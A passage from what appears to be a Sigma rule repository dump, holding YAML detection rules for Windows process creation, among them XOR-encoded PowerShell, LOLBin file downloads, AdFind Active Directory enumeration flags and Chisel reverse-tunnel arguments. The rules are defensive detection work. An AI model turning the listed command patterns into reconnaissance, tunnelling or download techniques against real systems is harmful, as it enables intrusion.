'bgBFAFQALgB3AEUAQg'\n            - '4ARQBUAC4AdwBFAEIA'\n            - 'uAEUAVAAuAHcARQBCA'\n            - 'TgBFAFQALgB3AEUAQg'\n            - 'OAEUAVAAuAHcARQBCA'\n            - 'TgBlAHQALgBXAEUAQg'\n            - '4AZQB0AC4AVwBFAEIA'\n            - 'OAGUAdAAuAFcARQBCA'\n            - 'bgBFAHQALgBXAEUAQg'\n            - '4ARQB0AC4AVwBFAEIA'\n            - 'uAEUAdAAuAFcARQBCA'\n            - 'TgBFAHQALgBXAEUAQg'\n            - 'OAEUAdAAuAFcARQBCA'\n            - 'bgBlAFQALgBXAEUAQg'\n            - '4AZQBUAC4AVwBFAEIA'\n            - 'uAGUAVAAuAFcARQBCA'\n            - 'TgBlAFQALgBXAEUAQg'\n            - 'OAGUAVAAuAFcARQBCA'\n            - 'bgBFAFQALgBXAEUAQg'\n            - '4ARQBUAC4AVwBFAEIA'\n            - 'uAEUAVAAuAFcARQBCA'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_x509enrollment.yml",
    "content": "title: Suspicious X509Enrollment - Process Creation\nid: 114de787-4eb2-48cc-abdb-c0b449f93ea4\nrelated:\n    - id: 504d63cb-0dba-4d02-8531-e72981aace2c\n      type: similar\nstatus: test\ndescription: Detect use of X509Enrollment\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=41\n    - https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115\nauthor: frack113\ndate: 2022-12-23\ntags:\n    - attack.defense-evasion\n    - attack.t1553.004\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains:\n            - 'X509Enrollment.CBinaryConverter'\n            - '884e2002-217d-11da-b2a4-000e7bbb2b09'\n    condition: selection\nfalsepositives:\n    - Legitimate administrative script\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_xor_commandline.yml",
    "content": "title: Suspicious XOR Encoded PowerShell Command\nid: bb780e0c-16cf-4383-8383-1e5471db6cf9\nrelated:\n    - id: 5b572dcf-254b-425c-a8c5-d9af6bea35a6\n      type: obsolete\nstatus: test\ndescription: Detects presence of a potentially xor encoded powershell command\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65\n    - https://redcanary.com/blog/yellow-cockatoo/\n    - https://zero2auto.com/2020/05/19/netwalker-re/\n    - https://mez0.cc/posts/cobaltstrike-powershell-exec/\nauthor: Sami Ruohonen, Harish Segar, Tim Shelton, Teymur Kheirkhabarov, Vasiliy Burov, oscd.community, Nasreddine Bencherchali\ndate: 2018-09-05\nmodified: 2023-01-30\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1059.001\n    - attack.t1140\n    - attack.t1027\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n        - Description: 'Windows PowerShell'\n        - Product: 'PowerShell Core 6'\n    selection_cli_xor:\n        CommandLine|contains: 'bxor'\n    selection_cli_other:\n        CommandLine|contains:\n            - 'ForEach'\n            - 'for('\n            - 'for '\n            - '-join '\n            - \"-join'\"\n            - '-join\"'\n            - '-join`'\n            - '::Join'\n            - '[char]'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_zip_compress.yml",
    "content": "title: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet\nid: 85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98 # Process Creation\nrelated:\n    - id: 71ff406e-b633-4989-96ec-bc49d825a412 # PowerShell Classic\n      type: similar\n    - id: daf7eb81-35fd-410d-9d7a-657837e602bb # PowerShell Module\n      type: similar\n    - id: b7a3c9a3-09ea-4934-8864-6a32cacd98d9 # PowerShell Script\n      type: similar\nstatus: test\ndescription: |\n    Detects PowerShell scripts that make use of the \"Compress-Archive\" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration.\n    An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md\n    - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\nauthor: Nasreddine Bencherchali (Nextron Systems), frack113\ndate: 2021-07-20\nmodified: 2022-10-09\ntags:\n    - attack.collection\n    - attack.t1074.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains:\n            - 'Compress-Archive -Path*-DestinationPath $env:TEMP'\n            - 'Compress-Archive -Path*-DestinationPath*\\AppData\\Local\\Temp\\'\n            - 'Compress-Archive -Path*-DestinationPath*:\\Windows\\Temp\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_presentationhost_download.yml",
    "content": "title: Arbitrary File Download Via PresentationHost.EXE\nid: b124ddf4-778d-418e-907f-6dd3fc0d31cd\nstatus: test\ndescription: Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files to download arbitrary files\nreferences:\n    - https://github.com/LOLBAS-Project/LOLBAS/pull/239/files\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-19\nmodified: 2023-11-09\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\presentationhost.exe'\n        - OriginalFileName: 'PresentationHost.exe'\n    selection_cli:\n        CommandLine|contains:\n            - 'http://'\n            - 'https://'\n            - 'ftp://'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_presentationhost_uncommon_location_exec.yml",
    "content": "title: XBAP Execution From Uncommon Locations Via PresentationHost.EXE\nid: d22e2925-cfd8-463f-96f6-89cec9d9bc5f\nstatus: test\ndescription: |\n    Detects the execution of \".xbap\" (Browser Applications) files via PresentationHost.EXE from an uncommon location. These files can be abused to run malicious \".xbap\" files any bypass AWL\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Presentationhost/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-01\nmodified: 2023-11-09\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\presentationhost.exe'\n        - OriginalFileName: 'PresentationHost.exe'\n    selection_cli:\n        CommandLine|contains: '.xbap'\n    filter_main_generic:\n        CommandLine|contains: # Filter out legitimate locations if you find them\n            - ' C:\\Windows\\'\n            - ' C:\\Program Files'\n    condition: all of selection* and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate \".xbap\" being executed via \"PresentationHost\"\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pressanykey_lolbin_execution.yml",
    "content": "title: Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution\nid: a20391f8-76fb-437b-abc0-dba2df1952c6\nrelated:\n    - id: 65c3ca2c-525f-4ced-968e-246a713d164f\n      type: similar\nstatus: test\ndescription: Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary\nreferences:\n    - https://twitter.com/mrd0x/status/1463526834918854661\n    - https://gist.github.com/nasbench/a989ce64cefa8081bd50cf6ad8c491b5\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-01-11\nmodified: 2023-04-11\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\Microsoft.NodejsTools.PressAnyKey.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate use by developers as part of NodeJS development with Visual Studio Tools\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_print_remote_file_copy.yml",
    "content": "title: Abusing Print Executable\nid: bafac3d6-7de9-4dd9-8874-4a1194b493ed\nstatus: test\ndescription: Attackers can use print.exe for remote file copy\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Print/\n    - https://twitter.com/Oddvarmoe/status/985518877076541440\nauthor: 'Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative'\ndate: 2020-10-05\nmodified: 2022-07-07\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\print.exe'\n        CommandLine|startswith: 'print'\n        CommandLine|contains|all:\n            - '/D'\n            - '.exe'\n    filter_print:\n        CommandLine|contains: 'print.exe'\n    condition: selection and not filter_print\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_protocolhandler_download.yml",
    "content": "title: File Download Using ProtocolHandler.exe\nid: 104cdb48-a7a8-4ca7-a453-32942c6e5dcb\nstatus: test\ndescription: |\n    Detects usage of \"ProtocolHandler\" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE)\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/ProtocolHandler/\nauthor: frack113\ndate: 2021-07-13\nmodified: 2023-11-09\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\protocolhandler.exe'\n        - OriginalFileName: 'ProtocolHandler.exe'\n    selection_cli:\n        CommandLine|contains:\n            - 'ftp://'\n            - 'http://'\n            - 'https://'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_provlaunch_potential_abuse.yml",
    "content": "title: Potential Provlaunch.EXE Binary Proxy Execution Abuse\nid: 7f5d1c9a-3e83-48df-95a7-2b98aae6c13c\nrelated:\n    - id: f9999590-1f94-4a34-a91e-951e47bedefd # CLI Abuse\n      type: similar\n    - id: 2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25 # CLI Registry\n      type: similar\n    - id: 7021255e-5db3-4946-a8b9-0ba7a4644a69 # Registry\n      type: similar\nstatus: test\ndescription: Detects child processes of \"provlaunch.exe\" which might indicate potential abuse to proxy execution.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/\n    - https://twitter.com/0gtweet/status/1674399582162153472\nauthor: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel\ndate: 2023-08-08\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\provlaunch.exe'\n    filter_main_covered_children:\n        # Note: this filter is here to avoid duplicate alerting by f9999590-1f94-4a34-a91e-951e47bedefd\n        - Image|endswith:\n              - '\\calc.exe'\n              - '\\cmd.exe'\n              - '\\cscript.exe'\n              - '\\mshta.exe'\n              - '\\notepad.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\regsvr32.exe'\n              - '\\rundll32.exe'\n              - '\\wscript.exe'\n        - Image|contains:\n              - ':\\PerfLogs\\'\n              - ':\\Temp\\'\n              - ':\\Users\\Public\\'\n              - '\\AppData\\Temp\\'\n              - '\\Windows\\System32\\Tasks\\'\n              - '\\Windows\\Tasks\\'\n              - '\\Windows\\Temp\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_provlaunch_susp_child_process.yml",
    "content": "title: Suspicious Provlaunch.EXE Child Process\nid: f9999590-1f94-4a34-a91e-951e47bedefd\nrelated:\n    - id: 7f5d1c9a-3e83-48df-95a7-2b98aae6c13c # CLI Generic\n      type: similar\n    - id: 2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25 # CLI Registry\n      type: similar\n    - id: 7021255e-5db3-4946-a8b9-0ba7a4644a69 # Registry\n      type: similar\nstatus: test\ndescription: Detects suspicious child processes of \"provlaunch.exe\" which might indicate potential abuse to proxy execution.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/\n    - https://twitter.com/0gtweet/status/1674399582162153472\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-08\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\provlaunch.exe'\n    selection_child:\n        - Image|endswith:\n              - '\\calc.exe'\n              - '\\cmd.exe'\n              - '\\cscript.exe'\n              - '\\mshta.exe'\n              - '\\notepad.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\regsvr32.exe'\n              - '\\rundll32.exe'\n              - '\\wscript.exe'\n        - Image|contains:\n              - ':\\PerfLogs\\'\n              - ':\\Temp\\'\n              - ':\\Users\\Public\\'\n              - '\\AppData\\Temp\\'\n              - '\\Windows\\System32\\Tasks\\'\n              - '\\Windows\\Tasks\\'\n              - '\\Windows\\Temp\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_psr_capture_screenshots.yml",
    "content": "title: Screen Capture Activity Via Psr.EXE\nid: 2158f96f-43c2-43cb-952a-ab4580f32382\nstatus: test\ndescription: Detects execution of Windows Problem Steps Recorder (psr.exe), a utility used to record the user screen and clicks.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Psr/\n    - https://web.archive.org/web/20200229201156/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1493861893.pdf\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md\nauthor: Beyu Denis, oscd.community\ndate: 2019-10-12\nmodified: 2024-01-04\ntags:\n    - attack.collection\n    - attack.t1113\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\Psr.exe'\n        CommandLine|contains:\n            - '/start'\n            - '-start'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_3proxy_execution.yml",
    "content": "title: PUA - 3Proxy Execution\nid: f38a82d2-fba3-4781-b549-525efbec8506\nstatus: test\ndescription: Detects the use of 3proxy, a tiny free proxy server\nreferences:\n    - https://github.com/3proxy/3proxy\n    - https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-09-13\nmodified: 2023-02-21\ntags:\n    - attack.command-and-control\n    - attack.t1572\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith: '\\3proxy.exe'\n    selection_pe:\n        Description: '3proxy - tiny proxy server'\n    selection_params: # param combos seen in the wild\n        CommandLine|contains: '.exe -i127.0.0.1 -p'\n    condition: 1 of selection_*\nfalsepositives:\n    - Administrative activity\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_adfind_enumeration.yml",
    "content": "title: PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE\nid: 455b9d50-15a1-4b99-853f-8d37655a4c1b\nrelated:\n    - id: 9a132afa-654e-11eb-ae93-0242ac130002\n      type: similar\n    - id: 514e7e3e-b3b4-4a67-af60-be20f139198b\n      type: similar\nstatus: test\ndescription: Detects active directory enumeration activity using known AdFind CLI flags\nreferences:\n    - https://www.joeware.net/freetools/tools/adfind/\n    - https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.002/T1087.002.md\nauthor: frack113\ndate: 2021-12-13\nmodified: 2023-03-05\ntags:\n    - attack.discovery\n    - attack.t1087.002\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_password: # Listing password policy\n        CommandLine|contains:\n            - lockoutduration\n            - lockoutthreshold\n            - lockoutobservationwindow\n            - maxpwdage\n            - minpwdage\n            - minpwdlength\n            - pwdhistorylength\n            - pwdproperties\n    selection_enum_ad: # Enumerate Active Directory Admins\n        CommandLine|contains: '-sc admincountdmp'\n    selection_enum_exchange: # Enumerate Active Directory Exchange AD Objects\n        CommandLine|contains: '-sc exchaddresses'\n    condition: 1 of selection_*\nfalsepositives:\n    - Authorized administrative activity\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_pua_adfind_enumeration/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_adfind_execution.yml",
    "content": "title: PUA - AdFind.EXE Execution\nid: 514e7e3e-b3b4-4a67-af60-be20f139198b\nrelated:\n    - id: 455b9d50-15a1-4b99-853f-8d37655a4c1b\n      type: similar\nstatus: experimental\ndescription: Detects execution of Adfind.exe utility, which can be used for reconnaissance in an Active Directory environment\nreferences:\n    - https://www.joeware.net/freetools/tools/adfind/\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.002/T1087.002.md\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-02-26\ntags:\n    - attack.discovery\n    - attack.t1087.002\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        - Image|endswith: '\\AdFind.exe'\n        - OriginalFileName: 'AdFind.exe'\n        - Hashes|contains:\n              - 'IMPHASH=d144de8117df2beceaba2201ad304764'\n              - 'IMPHASH=12ce1c0f3f5837ecc18a3782408fa975'\n              - 'IMPHASH=bca5675746d13a1f246e2da3c2217492'\n              - 'IMPHASH=4fbf3f084fbbb2470b80b2013134df35'\n              - 'IMPHASH=49b639b4acbecc49d72a01f357aa4930'\n              - 'IMPHASH=53e117a96057eaf19c41380d0e87f1c2'\n              - 'IMPHASH=680dad9e300346e05a85023965867201'\n              - 'IMPHASH=21aa085d54992511b9f115355e468782'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_pua_adfind_execution/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_adfind_susp_usage.yml",
    "content": "title: PUA - AdFind Suspicious Execution\nid: 9a132afa-654e-11eb-ae93-0242ac130002\nrelated:\n    - id: 455b9d50-15a1-4b99-853f-8d37655a4c1b\n      type: similar\n    - id: 75df3b17-8bcc-4565-b89b-c9898acef911\n      type: obsolete\nstatus: test\ndescription: Detects AdFind execution with common flags seen used during attacks\nreferences:\n    - https://www.joeware.net/freetools/tools/adfind/\n    - https://thedfirreport.com/2020/05/08/adfind-recon/\n    - https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/\n    - https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/\n    - https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx\n    - https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md\n    - https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1087.002/T1087.002.md#atomic-test-7---adfind---enumerate-active-directory-user-objects\nauthor: Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community\ndate: 2021-02-02\nmodified: 2025-10-24\ntags:\n    - attack.discovery\n    - attack.t1018\n    - attack.t1087.002\n    - attack.t1482\n    - attack.t1069.002\n    - stp.1u\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - 'domainlist'\n            - 'trustdmp'\n            - 'dcmodes'\n            - 'adinfo'\n            - '-sc dclist'\n            - 'computer_pwdnotreqd'\n            - 'objectcategory='\n            - '-subnets -f'\n            - 'name=\"Domain Admins\"'\n            - '-sc u:'\n            - 'domainncs'\n            - 'dompol'\n            - ' oudmp '\n            - 'subnetdmp'\n            - 'gpodmp'\n            - 'fspdmp'\n            - 'users_noexpire'\n            - 'computers_active'\n            - 'computers_pwdnotreqd'\n    condition: selection\nfalsepositives:\n    - Legitimate admin activity\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Adfind - Enumerate Active Directory Computer Objects\n      technique: T1018\n      atomic_guid: a889f5be-2d54-4050-bd05-884578748bb4\n    - type: atomic-red-team\n      name: Adfind - Enumerate Active Directory Domain Controller Objects\n      technique: T1018\n      atomic_guid: 5838c31e-a0e2-4b9f-b60a-d79d2cb7995e\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner.yml",
    "content": "title: PUA - Advanced IP Scanner Execution\nid: bef37fa2-f205-4a7b-b484-0759bfd5f86f\nstatus: test\ndescription: Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.\nreferences:\n    - https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/\n    - https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html\n    - https://labs.f-secure.com/blog/prelude-to-ransomware-systembc\n    - https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf\n    - https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer\n    - https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20IP%20Scanner\nauthor: Nasreddine Bencherchali (Nextron Systems), @ROxPinTeddy\ndate: 2020-05-12\nmodified: 2023-02-07\ntags:\n    - attack.discovery\n    - attack.t1046\n    - attack.t1135\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|contains: '\\advanced_ip_scanner' # Covers also advanced_ip_scanner_console.exe\n        - OriginalFileName|contains: 'advanced_ip_scanner' # Covers also advanced_ip_scanner_console.exe\n        - Description|contains: 'Advanced IP Scanner'\n    selection_cli:\n        CommandLine|contains|all:\n            - '/portable'\n            - '/lng'\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate administrative use\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_advanced_port_scanner.yml",
    "content": "title: PUA - Advanced Port Scanner Execution\nid: 54773c5f-f1cc-4703-9126-2f797d96a69d\nstatus: test\ndescription: Detects the use of Advanced Port Scanner.\nreferences:\n    - https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20Port%20Scanner\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-12-18\nmodified: 2023-02-07\ntags:\n    - attack.discovery\n    - attack.t1046\n    - attack.t1135\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|contains: '\\advanced_port_scanner'\n        - OriginalFileName|contains: 'advanced_port_scanner' # Covers also advanced_port_scanner_console.exe\n        - Description|contains: 'Advanced Port Scanner'\n    selection_cli:\n        CommandLine|contains|all:\n            - '/portable'\n            - '/lng'\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate administrative use\n    - Tools with similar commandline (very rare)\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_advancedrun.yml",
    "content": "title: PUA - AdvancedRun Execution\nid: d2b749ee-4225-417e-b20e-a8d2193cbb84\nrelated:\n    - id: fa00b701-44c6-4679-994d-5a18afa8a707\n      type: similar\nstatus: test\ndescription: Detects the execution of AdvancedRun utility\nreferences:\n    - https://twitter.com/splinter_code/status/1483815103279603714\n    - https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3\n    - https://www.elastic.co/security-labs/operation-bleeding-bear\n    - https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-01-20\nmodified: 2023-02-21\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1564.003\n    - attack.t1134.002\n    - attack.t1059.003\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        - OriginalFileName: 'AdvancedRun.exe'\n        - CommandLine|contains|all:\n              - ' /EXEFilename '\n              - ' /Run'\n        - CommandLine|contains|all:\n              - ' /WindowState 0'\n              - ' /RunAs '\n              - ' /CommandLine '\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_pua_advancedrun/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user.yml",
    "content": "title: PUA - AdvancedRun Suspicious Execution\nid: fa00b701-44c6-4679-994d-5a18afa8a707\nrelated:\n    - id: d2b749ee-4225-417e-b20e-a8d2193cbb84\n      type: similar\nstatus: test\ndescription: Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts\nreferences:\n    - https://twitter.com/splinter_code/status/1483815103279603714\n    - https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3\n    - https://www.elastic.co/security-labs/operation-bleeding-bear\n    - https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-01-20\nmodified: 2023-02-21\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1134.002\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains:\n            - '/EXEFilename'\n            - '/CommandLine'\n    selection_runas:\n        - CommandLine|contains:\n              - ' /RunAs 8 '\n              - ' /RunAs 4 '\n              - ' /RunAs 10 '\n              - ' /RunAs 11 '\n        - CommandLine|endswith:\n              - '/RunAs 8'\n              - '/RunAs 4'\n              - '/RunAs 10'\n              - '/RunAs 11'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_chisel.yml",
    "content": "title: PUA - Chisel Tunneling Tool Execution\nid: 8b0e12da-d3c3-49db-bb4f-256703f380e5\nrelated:\n    - id: cf93e05e-d798-4d9e-b522-b0248dc61eaf\n      type: similar\nstatus: test\ndescription: Detects usage of the Chisel tunneling tool via the commandline arguments\nreferences:\n    - https://github.com/jpillora/chisel/\n    - https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/\n    - https://blog.sekoia.io/lucky-mouse-incident-response-to-detection-engineering/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-09-13\nmodified: 2023-02-13\ntags:\n    - attack.command-and-control\n    - attack.t1090.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith: '\\chisel.exe'\n    selection_param1:\n        CommandLine|contains:\n            - 'exe client '\n            - 'exe server '\n    selection_param2:\n        CommandLine|contains:\n            - '-socks5'\n            - '-reverse'\n            - ' r:'\n            - ':127.0.0.1:'\n            - '-tls-skip-verify '\n            - ':socks'\n    condition: selection_img or all of selection_param*\nfalsepositives:\n    - Some false positives may occur with other tools with similar commandlines\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_cleanwipe.yml",
    "content": "title: PUA - CleanWipe Execution\nid: f44800ac-38ec-471f-936e-3fa7d9c53100\nstatus: test\ndescription: Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.\nreferences:\n    - https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/CleanWipe\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-12-18\nmodified: 2023-02-14\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        Image|endswith: '\\SepRemovalToolNative_x64.exe'\n    selection2:\n        Image|endswith: '\\CATClean.exe'\n        CommandLine|contains: '--uninstall'\n    selection3:\n        Image|endswith: '\\NetInstaller.exe'\n        CommandLine|contains: '-r'\n    selection4:\n        Image|endswith: '\\WFPUnins.exe'\n        CommandLine|contains|all:\n            - '/uninstall'\n            - '/enterprise'\n    condition: 1 of selection*\nfalsepositives:\n    - Legitimate administrative use (Should be investigated either way)\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_crassus.yml",
